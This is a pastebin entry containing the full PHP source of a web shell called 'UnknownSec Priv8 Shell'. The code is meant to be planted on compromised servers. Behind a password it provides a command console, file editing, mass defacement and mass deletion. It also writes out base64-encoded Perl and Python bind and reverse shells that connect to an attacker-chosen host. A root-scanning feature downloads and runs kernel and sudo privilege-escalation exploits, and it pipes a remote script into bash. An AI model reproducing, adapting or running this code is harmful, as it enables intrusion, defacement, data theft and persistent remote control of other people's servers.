Untitled

From Gamboge Giraffe, 1 Year ago, written in Plain Text.

Embed

Download Paste or View Raw
Hits: 83

<?php

/* thanks to anon7 and all mem anonsec */

set_time_limit(0);

error_reporting(0);

@ini_set('error_log',null);

@ini_set('log_errors',0);

@ini_set('max_execution_time',0);

@ini_set('output_buffering',0);

@ini_set('display_errors', 0);

session_start();

date_default_timezone_set("Asia/Jakarta");

$_7 = array_merge($_POST, $_GET);

$_r = "required='required'";

$gcw = "getcwd";

$inipass = "QCMkeDFuNG0xQCMk";

if(isset($_7['x1nam1'])){

echo "<div class='text-center text-muted'>@#$x1n4m1@#$</div>";

}

function Login() {

?>

<!DOCTYPE HTML>

<html>

<head>

<meta charset="UTF-8">

<meta name="viewport" content="width=device-width, initial-scale=0.70">

<title>{ login }</title>

<link rel="stylesheet" href="//xnxx.co.ws/meki.css">

<link rel="icon" href="//xnxx.co.ws/anya.jpg">

</head>

<body class="bg-dark">

<form method="POST">

<div class='container-fluid'>

<div class='py-3' id='main'>

<div class="input-group">

<div class="input-group-text"><i class="bi bi-person-circle"></i></div>

<input class="form-control form-control-sm" type="password" placeholder="password" name="p" $_r>

<button class="btn btn-outline-light btn-sm"><i class="bi bi-arrow-return-right"></i></button>

</div>

</div>

</div>

</form>

</body>

</html>

<?php

exit;

}

if(!isset($_SESSION[base64_encode($_SERVER['HTTP_HOST'])]))

if(empty($inipass) || (isset($_7['p']) && (base64_encode($_7['p']) == $inipass) ) )

$_SESSION[base64_encode($_SERVER['HTTP_HOST'])] = true;

else

Login();

// logout

if(isset($_7["left"])) {

session_start();

session_destroy();

echo '<script>window.location="'.$_SERVER['PHP_SELF'].'";</script>';

}

// download file

if(isset($_7['opn']) && ($_7['opn'] != '') && ($_7['action'] == 'download')){

@ob_clean();

$file = $_7['opn'];

header('Content-Description: File Transfer');

header('Content-Type: application/octet-stream');

header('Content-Disposition: attachment; filename="'.basename($file).'"');

header('Expires: 0');

header('Cache-Control: must-revalidate');

header('Pragma: public');

header('Content-Length: ' . filesize($file));

readfile($file);

exit;

}

function w($dir,$perm) {

if(!is_writable($dir)) {

return "<rd>".$perm."</rd>";

} else {

return "<gr>".$perm."</gr>";

}

}

function s(){

echo '<style>table{display:none;}</style><div class="table-responsive"><hr></div>';

}

function ok(){

echo '<div class="alert alert-success alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>';

}

function er(){

echo '<div class="alert alert-danger alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>';

}

function sz($byt){

$typ = array('B', 'KB', 'MB', 'GB', 'TB');

for($i = 0; $byt >= 1024 && $i < (count($typ) -1 ); $byt /= 1024, $i++ );

return(round($byt,2)." ".$typ[$i]);

}

function ia() {

$ia = '';

if (getenv('HTTP_CLIENT_IP'))

$ia = getenv('HTTP_CLIENT_IP');

else if(getenv('HTTP_X_FORWARDED_FOR'))

$ia = getenv('HTTP_X_FORWARDED_FOR');

else if(getenv('HTTP_X_FORWARDED'))

$ia = getenv('HTTP_X_FORWARDED');

else if(getenv('HTTP_FORWARDED_FOR'))

$ia = getenv('HTTP_FORWARDED_FOR');

else if(getenv('HTTP_FORWARDED'))

$ia = getenv('HTTP_FORWARDED');

else if(getenv('REMOTE_ADDR'))

$ia = getenv('REMOTE_ADDR');

else

$ia = 'Unknown IP.';

return $ia;

}

function exe($cmd) {

if(function_exists('system')) {

@ob_start();

@system($cmd);

$buff = @ob_get_contents();

@ob_end_clean();

return $buff;

} elseif(function_exists('exec')) {

@exec($cmd,$results);

$buff = "";

foreach($results as $result) {

$buff .= $result;

} return $buff;

} elseif(function_exists('passthru')) {

@ob_start();

@passthru($cmd);

$buff = @ob_get_contents();

@ob_end_clean();

return $buff;

} elseif(function_exists('shell_exec')) {

$buff = @shell_exec($cmd);

return $buff;

}

}

function exe_root($set,$sad) {

$x = "preg_match";

$xx = "2>&1";

if (!$x("/".$xx."/i", $set)) {

$set = $set." ".$xx;

}

$a = "function_exists";

$b = "proc_open";

$c = "htmlspecialchars";

$d = "stream_get_contents";

if ($a($b)) {

$ps = $b($set, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $pink,$sad);

return $d($pink[1]);

} else {

return "proc_open function is disabled !";

}

}

function p($file){

$p = fileperms($file);

if (($p & 0xC000) == 0xC000) {

$i = 's';

} elseif (($p & 0xA000) == 0xA000) {

$i = 'l';

} elseif (($p & 0x8000) == 0x8000) {

$i = '-';

} elseif (($p & 0x6000) == 0x6000) {

$i = 'b';

} elseif (($p & 0x4000) == 0x4000) {

$i = 'd';

} elseif (($p & 0x2000) == 0x2000) {

$i = 'c';

} elseif (($p & 0x1000) == 0x1000) {

$i = 'p';

} else {

$i = 'u';

}

$i .= (($p & 0x0100) ? 'r' : '-');

$i .= (($p & 0x0080) ? 'w' : '-');

$i .= (($p & 0x0040) ?

(($p & 0x0800) ? 's' : 'x' ) :

(($p & 0x0800) ? 'S' : '-'));

$i .= (($p & 0x0020) ? 'r' : '-');

$i .= (($p & 0x0010) ? 'w' : '-');

$i .= (($p & 0x0008) ?

(($p & 0x0400) ? 's' : 'x' ) :

(($p & 0x0400) ? 'S' : '-'));

$i .= (($p & 0x0004) ? 'r' : '-');

$i .= (($p & 0x0002) ? 'w' : '-');

$i .= (($p & 0x0001) ?

(($p & 0x0200) ? 't' : 'x' ) :

(($p & 0x0200) ? 'T' : '-'));

return $i;

}

if(isset($_7['dir'])) {

$dir = $_7['dir'];

chdir($dir);

} else {

$dir = $gcw();

}

echo "

<html>

<head>

<meta charset='UTF-8'>

<meta name='author' content='UnknownSec'>

<meta name='viewport' content='width=device-width, initial-scale=0.70'>

<link rel='stylesheet' href='//xnxx.co.ws/meki.css'>

<link rel='icon' href='//xnxx.co.ws/anya.jpg'>

<title>{ File Manager }</title>

<script src='//cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js'></script>

<script src='//cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js'></script>

<script src='//code.jquery.com/jquery-3.3.1.slim.min.js'></script>

</head>

<body class='bg-secondary text-light'>

<div class='container-fluid'>

<div class='py-3' id='main'>

<div class='box shadow bg-dark p-4 rounded-3'>

<a class='text-decoration-none text-light anu' href='".$_SERVER['PHP_SELF']."'><h4>UnknownSec Priv8 Shell</h4></a>";

if(isset($_7['path'])){

$path = $_7['path'];

chdir($path);

}else{

$path = $gcw();

}

$path = str_replace('\\','/',$path);

$paths = explode('/',$path);

foreach($paths as $id=>$pat){

if($pat == '' && $id == 0){

$a = true;

echo "<i class='bi bi-hdd-rack'></i>:<a class='text-decoration-none text-light' href='?path=/'>/</a>";

continue;

}

if($pat == '') continue;

echo "<a class='text-decoration-none' href='?path=";

for($i=0;$i<=$id;$i++){

echo "$paths[$i]";

if($i != $id) echo "/";

}

echo "'>".$pat."</a>/";

}

$scand = scandir($path);

echo " [ ".w($path, p($path))." ]";

// info

$sql = (function_exists('mysql_connect')) ? "<gr>ON</gr>" : "<rd>OFF</rd>";

$curl = (function_exists('curl_version')) ? "<gr>ON</gr>" : "<rd>OFF</rd>";

$wget = (exe('wget --help')) ? "<gr>ON</gr>" : "<rd>OFF</rd>";

$pl = (exe('perl --help')) ? "<gr>ON</gr>" : "<rd>OFF</rd>";

$py = (exe('python --help')) ? "<gr>ON</gr>" : "<rd>OFF</rd>";

$disfunc = @ini_get("disable_functions");

$kernel = php_uname();

$phpver = PHP_VERSION;

$phpos = PHP_OS;

$soft = $_SERVER["SERVER_SOFTWARE"];

$ip = gethostbyname($_SERVER['HTTP_HOST']);

if (empty($disfunc)) {

$disfc = "<gr>NONE</gr>";

} else {

$disfc = "<rd>$disfunc</rd>";

}

if(!function_exists('posix_getegid')) {

$user = @get_current_user();

$uid = @getmyuid();

$gid = @getmygid();

$group = "?";

} else {

$uid = @posix_getpwuid(posix_geteuid());

$gid = @posix_getgrgid(posix_getegid());

$user = $uid['name'];

$uid = $uid['uid'];

$group = $gid['name'];

$gid = $gid['gid'];

}

$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<rd>ON</rd>" : "<gr>OFF</gr>";

echo "

<div class='container-fluid'>

<div class='corner anu py-3'>

<button class='btn btn-outline-light btn-sm' data-bs-toggle='collapse' data-bs-target='#collapseExample' aria-expanded='false' aria-controls='collapseExample'><i class='bi bi-info-circle'></i> info <i class='bi bi-chevron-down'></i></button>

</div>

<div class='collapse text-dark mb-3' id='collapseExample'>

<div class='box shadow bg-light p-3 rounded-3'>

System: <gr>$kernel</gr><br>

Software: <gr>$soft</gr><br>

PHP version: <gr>$phpver</gr> <a class='text-decoration-none' href='?dir=$path&id=phpinfo'>[ PHPINFO ]</a> PHP os: <gr>$phpos</gr><br>

Server Ip: <gr>$ip</gr><br>

Your Ip: <gr>".ia()."</gr><br>

User: <gr>$user</gr> ($uid) | Group: <gr>$group</gr> ($gid)<br>

Safe Mode: $sm<br>

MySQL: $sql | Perl: $pl | Python: $py | WGET: $wget | CURL: $curl<br>

Disable Function:<br><pre>$disfc</pre>

</div>

</div>

</div>

<div class='text-center'>

<div class='btn-group'>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&id=upload'><i class='bi bi-upload'></i> Upload</a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&id=deface'><i class='bi bi-exclamation-diamond'></i> Mass deface</a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&id=delete'><i class='bi bi-trash'></i> Mass delete</a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&id=cmd'><i class='bi bi-terminal'></i> Console</a>

</div>

<div class='btn-group'>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&id=scan_root'><i class='bi bi-search'></i> Scan root</a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&id=network'><i class='bi bi-hdd-network'></i> Network</a>

<a class='btn btn-outline-light btn-sm' href='?left'><i class='bi bi-box-arrow-in-left'></i> Logout</a>

</div>

</div>";

// tools

if(isset($_7['dir'])) {

$dir = $_7['dir'];

chdir($dir);

} else {

$dir = $gcw();

}

$dir = str_replace("\\","/",$dir);

$scdir = explode("/", $dir);

for($i = 0; $i <= $c_dir; $i++) {

$scdir[$i];

if($i != $c_dir) {

}

// mass deface

if($_7['id'] == 'deface'){

function mass_all($dir,$namefile,$contents_sc) {

if(is_writable($dir)) {

$dira = scandir($dir);

foreach($dira as $dirb) {

$dirc = "$dir/$dirb";

$▚ = $dirc.'/'.$namefile;

if($dirb === '.') {

file_put_contents($▚, $contents_sc);

} elseif($dirb === '..') {

file_put_contents($▚, $contents_sc);

} else {

if(is_dir($dirc)) {

if(is_writable($dirc)) {

echo "[<gr><i class='bi bi-check-all'></i></gr>] $▚<br>";

file_put_contents($▚, $contents_sc);

$▟ = mass_all($dirc,$namefile,$contents_sc);

}

}

}

}

}

}

function mass_onedir($dir,$namefile,$contents_sc) {

if(is_writable($dir)) {

$dira = scandir($dir);

foreach($dira as $dirb) {

$dirc = "$dir/$dirb";

$▚ = $dirc.'/'.$namefile;

if($dirb === '.') {

file_put_contents($▚, $contents_sc);

} elseif($dirb === '..') {

file_put_contents($▚, $contents_sc);

} else {

if(is_dir($dirc)) {

if(is_writable($dirc)) {

echo "[<gr><i class='bi bi-check-all'></i></gr>] $dirb/$namefile<br>";

file_put_contents($▚, $contents_sc);

}

}

}

}

}

}

if($_7['start']) {

if($_7['tipe'] == 'mass') {

mass_all($_7['d_dir'], $_7['d_file'], $_7['script']);

} elseif($_7['tipe'] == 'onedir') {

mass_onedir($_7['d_dir'], $_7['d_file'], $_7['script']);

}

}

s();

echo "

<div class='card card-body text-dark input-group mb-3'>

<form method='POST'> Tipe:

<div class='form-check'>

<input class='form-check-input' type='checkbox' value='onedir' name='tipe' id='flexCheckDefault' checked>

<label class='form-check-label' for='flexCheckDefault'>One dir</label>

</div>

<div class='form-check'>

<input class='form-check-input' type='checkbox' value='mass' name='tipe' id='flexCheckDefault'>

<label class='form-check-label' for='flexCheckDefault'>All directory</label>

</div>

<i class='bi bi-folder'></i> Directory:

<input class='form-control btn-sm' type='text' name='d_dir' value='$dir' $_r>

<i class='bi bi-file-earmark'></i> Filename:

<input class='form-control btn-sm' type='text' name='d_file' placeholder='filename' $_r>

<i class='bi bi-file-earmark'></i> Your script:

<textarea class='form-control btn-sm' rows='7' name='script' placeholder='your script' $_r></textarea>

<div class='d-grid gap-2'>

<input class='btn btn-dark btn-sm' type='submit' name='start' value='deface'>

</div>

</form>

</div>";

}

// mass delete

if($_7['id'] == 'delete'){

function mass_delete($dir,$namefile) {

if(is_writable($dir)) {

$dira = scandir($dir);

foreach($dira as $dirb) {

$dirc = "$dir/$dirb";

$▚ = $dirc.'/'.$namefile;

if($dirb === '.') {

if(file_exists("$dir/$namefile")) {

unlink("$dir/$namefile");

}

} elseif($dirb === '..') {

if(file_exists("".dirname($dir)."/$namefile")) {

unlink("".dirname($dir)."/$namefile");

}

} else {

if(is_dir($dirc)) {

if(is_writable($dirc)) {

if(file_exists($▚)) {

echo "[<gr><i class='bi bi-check-all'></i></gr>] $▚<br>";

unlink($▚);

$▟ = mass_delete($dirc,$namefile);

}

}

}

}

}

}

}

if($_7['start']) {

mass_delete($_7['d_dir'], $_7['d_file']);

}

s();

echo "

<div class='card card-body text-dark input-group mb-3'>

<form method='POST'>

<i class='bi bi-folder'></i> Directory:

<input class='form-control btn-sm' type='text' name='d_dir' value='$dir' $_r>

<i class='bi bi-file-earmark'></i> Filename:

<div class='input-group'>

<input class='form-control btn-sm' type='text' name='d_file' placeholder='filename' $_r><br>

<div class='input-group-append'>

<input class='btn btn-dark btn-sm' type='submit' name='start' value='delete'>

</div>

</div>

</form>

</div>";

}

// phpinfo

if($_7['id'] == 'phpinfo'){

@ob_start();

@eval("phpinfo();");

$buff = @ob_get_contents();

@ob_end_clean();

$front = strpos($buff,"<body>")+6;

$end = strpos($buff,"</body>");

echo "<pre class='php_info'>".substr($buff,$front,$front-$front)."</pre>";

exit;

}

// network

if($_7['id'] == 'network'){

s();

echo "

<div class='card text-dark'>

<div class='card-header'>

<form method='post'>

<u>Bind port to /bin/sh [Perl]</u><br>

<u>Port :</u>

<div class='input-group'>

<input class='form-control btn-sm' type='text' name='port' placeholder='6969'>

<input class='btn btn-dark btn-sm' type='submit' name='bpl' value='submit'>

</div>

<h5>Back-Connect</h5>

<u>Server :</u>

<input class='form-control btn-sm' type='text' name='server' placeholder='". $_SERVER['REMOTE_ADDR'] ."'>

<u>Port :</u>

<div class='input-group'>

<input class='form-control btn-sm' type='text' name='port' placeholder='6969'>

<select class='form-control btn-sm' name='bc'>

<option value='perl'>perl</option>

<option value='python'>python</option>

</select>

</div>

<div class='d-grid gap-2'>

<input class='btn btn-dark btn-sm btn-block' type='submit' value='submit'>

</div>

</form>";

if($_7['bpl']){

$bp = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=");

$brt = @fopen('bp.pl','w');

fwrite($brt,$bp);

$out = exe("perl bp.pl ".$_7['port']." 1>/dev/null 2>&1 &");

sleep(1);

echo "<pre>$out\n".exe("ps aux | grep bp.pl")."</pre>";

unlink("bp.pl");

}

if($_7['bc'] == 'perl'){

$bc = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7");

$plbc = @fopen('bc.pl','w');

fwrite($plbc,$bc);

$out = exe("perl bc.pl ".$_7['server']." ".$_7['port']." 1>/dev/null 2>&1 &");

sleep(1);

echo "<pre>$out\n".exe("ps aux | grep bc.pl")."</pre>";

unlink("bc.pl");

}

if($_7['bc'] == 'python'){

$bc_py = base64_decode("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk=");

$pbc_py = @fopen('bcpy.py','w');

fwrite($pbc_py,$bc_py);

$out_py = exe("python bcpy.py ".$_7['server']." ".$_7['port']);

sleep(1);

echo "<pre>$out_py\n".exe("ps aux | grep bcpy.py")."</pre>";

unlink("bcpy.py");

}

echo "</div>

</div>

<br/>";

}

// console

if($_7['id'] == 'cmd') {

s();

if(!empty($_POST['cmd'])) {

$cmd = shell_exec($_POST['cmd'].' 2>&1');

}

echo "

<div class='mb-3'>

<form method='POST'>

<div class='input-group mb-3'>

<input class='form-control btn-sm' type='text' name='cmd' value='".htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8')."' placeholder='whoami' $_r>

<button class='btn btn-outline-light btn-sm' type='sumbit'><i class='bi bi-arrow-return-right'></i></button>

</div>

</form>";

if($cmd):

echo '

<div class="container-fluid language-javascript">

<div class="shell mb-3">

<pre style="font-size:10px;"><gr>~</gr>$ <rd>'.htmlspecialchars($_POST['cmd']).'</rd><br><code>'.htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8').'</code></pre>

</div>

</div>';

elseif(!$cmd && $_SERVER['REQUEST_METHOD'] == 'POST'):

echo '

<div class="container-fluid language-javascript">

<div class="shell mb-3">

<pre style="font-size:10px;"><code>No result</code></pre>

</div>

</div>

</div>';

endif;

}

// mulltiple upload

if($_7['id'] == 'upload'){

s();

if(isset($_7['upl'])){

$result = count($_FILES['file']['name']);

for($contents=0;$contents<$result;$contents++){

$namefile = $_FILES['file']['name'][$contents];

$up = @copy($_FILES['file']['tmp_name'][$contents],"$path/".$namefile);

}

if($result < 2){

if($up){

echo "<strong>Upload</strong> $namefile ok! ".ok()."</div>";

}else{

echo '<strong>Upload</strong> fail! '.er().'</div>';

}

}else{

echo "<strong>Upload</strong> $result ok! ".ok()."</div>";

}

}

echo "

<div class='card card-body text-dark input-group mb-3'>

<u>Multiple upload</u>

<form method='POST' enctype='multipart/form-data'>

<div class='input-group'>

<input class='form-control form-control-sm' type='file' name='file[]' multiple='' $_r>

<input class='btn btn-dark btn-sm' type='submit' name='upl' value='upload'>

</div>

</form>

</div>";

}

}

// scanner root #anon7

if (isset($_GET['dir']) && $_GET['id'] == "scan_root") {

ob_implicit_flush();ob_end_flush();s();

echo "

<div class='text-center'>

<div class='btn-group mb-3'>

<a class='btn btn-outline-light btn-sm' href='".$_SERVER['REQUEST_URI']."&id_two=autoscan'><i class='bi bi-bug'></i> Auto scan</a>

<a class='btn btn-outline-light btn-sm' href='".$_SERVER['REQUEST_URI']."&id_two=scansd'><i class='bi bi-search'></i> Scan SUID</a>

<a class='btn btn-outline-light btn-sm' href='".$_SERVER['REQUEST_URI']."&id_two=esg'><i class='bi bi-search'></i> Exploit suggester</a>

</div>

</div>";

if (!function_exists("proc_open")) {

echo "<center class='anu'>Command is Disabled !</center>";

}

if (!is_writable($path)) {

echo "<center class='anu'>Current Directory is Unwriteable !</center>";

}

if (isset($_GET['id_two']) && $_GET['id_two'] == "autoscan") {

if (!file_exists($path."/rooting/")) {

mkdir($path."/rooting");

exe_root("wget https://raw.githubusercontent.com/hekerprotzy/rootshell/main/auto.tar.gz", $path."/rooting");

exe_root("tar -xf auto.tar.gz", $path."/rooting");

if (!file_exists($path."/rooting/netfilter")) {

die("<center class='anu'>Failed to Download Material !</center>");

}

}

echo '

<div class="container-fluid language-javascript">

<div class="shell mb-3">

<pre style="font-size:10px;"><code>Netfilter : '.exe_root("timeout 10 ./rooting/netfilter", $path).'Ptrace : '.exe_root("echo id | timeout 10 ./rooting/ptrace", $path).'Sequoia : '.exe_root("timeout 10 ./rooting/sequoia", $path).'OverlayFS : '.exe_root("echo id | timeout 10 ./overlayfs", $path."/rooting").'Dirtypipe : '.exe_root("echo id | timeout 10 ./rooting/dirtypipe /usr/bin/su", $path).'Sudo : '.exe_root("echo 12345 | timeout 10 sudoedit -s Y", $path).'Pwnkit : '.exe_root("echo id | timeout 10 ./pwnkit", $path."/rooting").'</code></pre>

</div>

</div>';

} elseif (isset($_GET['id_two']) && $_GET['id_two'] == "scansd") {

echo '<center class="anu">[+] Scanning ...</center>';

echo '

<div class="container-fluid language-javascript">

<div class="shell mb-3">

<pre style="font-size:10px;"><code>'.exe_root("find / -perm -u=s -type f 2>/dev/null", $path).'</code></pre>

</div>

</div>';

} elseif (isset($_GET['id_two']) && $_GET['id_two'] == "esg") {

echo '<center class="anu">[+] Loading ...</center>';

echo '

<div class="container-fluid language-javascript">

<div class="shell mb-3">

<pre style="font-size:10px;"><code>'.exe_root("curl -Lsk http://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh | bash", $path).'</code></pre>

</div>

</div>';

}

}

// openfile

if(isset($_7['opn'])) {

$file = $_7['opn'];

}

// view

if($_7['action'] == 'view') {

s();

echo "

<div class='btn-group'>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=view&opn=$file'><i class='bi bi-eye-fill'></i></a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=edit&opn=$file'><i class='bi bi-pencil-square'></i></a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=rename&opn=$file'><i class='bi bi-pencil-fill'></i></a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=delete_file&opn=$file'><i class='bi bi-trash-fill'></i></a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=download&opn=$file'><i class='bi bi-download'></i></a>

</div>

<br>

<i class='bi bi-file-earmark'></i>: ".basename($file)."

</br>

<div class='bg-dark'>

<div class='container-fluid language-javascript'>

<textarea rows='10' class='form-control' disabled=''>".htmlspecialchars(file_get_contents($file))."</textarea>

</div>

</div>";

}

// edit

if(isset($_7['edit_file'])) {

$updt = fopen("$file", "w");

$result = fwrite($updt, $_7['contents']);

if ($result) {

echo '<strong>Edit file</strong> ok! '.ok().'</div>';

}else{

echo '<strong>Edit file</strong> fail! '.er().'</div>';

}

}

if($_7['action'] == 'edit') {

s();

echo "

<div class='btn-group'>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=view&opn=$file'><i class='bi bi-eye-fill'></i></a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=edit&opn=$file'><i class='bi bi-pencil-square'></i></a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=rename&opn=$file'><i class='bi bi-pencil-fill'></i></a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=delete_file&opn=$file'><i class='bi bi-trash-fill'></i></a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=download&opn=$file'><i class='bi bi-download'></i></a>

</div>

<br>

<i class='bi bi-file-earmark'></i>: ".basename($file)."

</br>

<form method='POST'>

<textarea class='form-control btn-sm' rows='10' name='contents' $_r>".htmlspecialchars(file_get_contents($file))."</textarea>

<div class='d-grid gap-2'>

<button class='btn btn-outline-light btn-sm' type='sumbit' name='edit_file'><i class='bi bi-arrow-return-right'></i></button>

</div>

</form>";

}

//rename folder

if($_7['action'] == 'rename_folder') {

if($_7['r_d']) {

$r_d = rename($dir, "".dirname($dir)."/".htmlspecialchars($_7['r_d'])."");

if($r_d) {

echo '<strong>Rename folder</strong> ok! '.ok().'<a class="btn-close" href="?path='.dirname($dir).'"></a></div>';

}else{

echo '<strong>Rename folder</strong> fail! '.er().'<a class="btn-close" href="?path='.dirname($dir).'"></a></div>';

}

}

s();

echo "

<div class='btn-group'>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=delete_folder'><i class='bi bi-trash-fill'></i></a>

</div>

<br>

<i class='bi bi-folder-fill'></i>: ".basename($dir)."

</br>

<form method='POST'>

<div class='input-group'>

<input class='form-control btn-sm' type='text' value='".basename($dir)."' name='r_d' $_r>

<button class='btn btn-outline-light btn-sm' type='submit'><i class='bi bi-arrow-return-right'></i></button>

</div>

</form>";

}

//rename file

if(isset($_7['r_f'])) {

$old = $file;

$new = $_7['new_name'];

rename($new, $old);

if(file_exists($new)) {

echo '<div class="alert alert-warning alert-dismissible fade show my-3" role="alert">

<strong>Rename file</strong> name already in use! <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>

</div>';

}else{

if(rename($old, $new)) {

echo '<strong>Rename file</strong> ok! '.ok().'</div>';

}else{

echo '<strong>Rename file</strong> fail! '.er().'</div>';

}

}

}

if($_7['action'] == 'rename') {

s();

echo "

<div class='btn-group'>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=view&opn=$file'><i class='bi bi-eye-fill'></i></a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=edit&opn=$file'><i class='bi bi-pencil-square'></i></a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=rename&opn=$file'><i class='bi bi-pencil-fill'></i></a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=delete_file&opn=$file'><i class='bi bi-trash-fill'></i></a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=download&opn=$file'><i class='bi bi-download'></i></a>

</div>

<br>

<i class='bi bi-file-earmark'></i>: ".basename($file)."

</br>

<form method='POST'>

<div class='input-group'>

<input class='form-control btn-sm' type='text' name='new_name' value='".basename($file)."' $_r>

<button class='btn btn-outline-light btn-sm' type='sumbit' name='r_f'><i class='bi bi-arrow-return-right'></i></button>

</div>

</form>";

}

//delete file

if ($_7['action'] == 'delete_file') {

s();

if ($_7['yeahx']) {

$delete = unlink($file);

if ($delete) {

echo '<strong>Delete file</strong> ok! '.ok().'</div>';

}else{

echo '<strong>Delete file</strong> fail! '.er().'</div>';

}

}

echo "

<div class='btn-group mb-3'>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=view&opn=$file'><i class='bi bi-eye-fill'></i></a>

<a class='btn btn-outline-light btn-sm' href='?dir=$path&action=edit&opn=$file'><i class='bi bi-pencil-square'></i></a>

